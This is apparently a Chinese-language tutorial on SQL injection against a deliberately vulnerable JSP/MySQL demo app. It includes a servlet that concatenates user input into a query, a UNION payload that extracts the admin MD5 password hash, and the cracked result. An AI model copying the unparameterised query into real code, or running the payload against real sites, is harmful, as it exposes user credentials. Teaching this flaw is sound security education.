jsp mysql 注入攻击实例
例子 要查询信息 并显示出来
SQL 信息表与admin表 插入信息 md5 加密的密码
CREATE TABLE `admin` (
`Id` int(11) NOT NULL AUTO_INCREMENT,
`Name` varchar(40) NOT NULL,
`Psw` varchar(100) NOT NULL,
PRIMARY KEY (`Id`)
)ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE `info` (
`Id` int(11) NOT NULL AUTO_INCREMENT,
`Info` varchar(40) NOT NULL,
PRIMARY KEY (`Id`)
)ENGINE=InnoDB DEFAULT CHARSET=utf8;
insert into info(`Info`) values('SQLinject');
insert into admin(`Name`,`Psw`) values('admin','E10ADC3949BA59ABBE56E057F20F883E');开始页---点击传参 --查询信息
<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
<%
String path = request.getContextPath();
String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
%>
SQL注入测试
<% String info="SQLinject"; %>
查询info的信息
查询servlet
package servlet;
import javax.servlet.http.HttpServlet;
import java.io.IOException;
import javax.servlet.RequestDispatcher;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import dal.infodal;
import java.sql.*;
public class info extends HttpServlet{
String ms="";
@Override
protected void service(HttpServletRequest req, HttpServletResponse res)
throws ServletException, IOException {
//取得表单数据
String info="";
if(req.getParameter("info")!=""&&req.getParameter("info").length()<100)
{
info=new String(req.getParameter("info").getBytes("ISO-8859-1"),"UTF-8");
}else{
ms+="info不正确";
}
ResultSet rs=infodal.serchinfo(info);
ms="信息查询成功";
req.setAttribute("rs", rs);
req.setAttribute("ms", ms);
RequestDispatcher rd=req.getRequestDispatcher("inforesult.jsp");
rd.forward(req,res);
}
}
package dal;
import java.sql.*;
import constant.dbconstant;
public class infodal {
public static ResultSet serchinfo(String info){
String driverClass=dbconstant.getDriverclass();
String url=dbconstant.getUrl();
String dbUser = dbconstant.getDbuser();
String dbPwd = dbconstant.getDbpwd();
try{
Class.forName(driverClass);
Connection con = DriverManager.getConnection(url,dbUser,dbPwd);
Statement stmt=con.createStatement();
//
String sql="select id,Info from info where Info='"+info+"'";
ResultSet rs=stmt.executeQuery(sql);
return rs;
}catch(Exception ex)
{
System.out.print("连接失败!!
"+ex.toString());
return null;
}
}
}
显示查询信息
<%@ page language="java"
import="java.util.*"
import="java.sql.*"
import="constant.dbconstant"
pageEncoding="UTF-8"%>
<%
String path = request.getContextPath();
String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
%>
SQL注入测试
<%
ResultSet rs=(ResultSet)request.getAttribute("rs");
while(rs.next())
{
%>
查询的信息为: <%=rs.getInt("Id") %>
查询的信息为: <%=rs.getString("Info") %>
查询的信息为: <%=rs.getNString(2) %>
<%}%>
<%
String msg="";
msg=(String)request.getAttribute("ms");
if(msg==null){
msg="";
}else{
request.removeAttribute("ms");
}
%>
<%=msg %>
web.xml
Info
servlet.info
Info
/Info
以上为很常见的jsp过程 参数info 没有过滤 也没有参数化查询
注入语句
SQLinject' union select 2,Psw from admin where Name='admin2 为常数 因为要对齐info 个数为2 int stirng
查询语句为
select Id,Info from Info where Info='SQLinject' union select 2,Psw from admin where Name='admin';查询出来的信息为
info 的 Id Info 1 'SQLinject'
2 Psw 2 'E10ADC3949BA59ABBE56E057F20F883E'
E10ADC3949BA59ABBE56E057F20F883E 为md5密码 在线查询 123456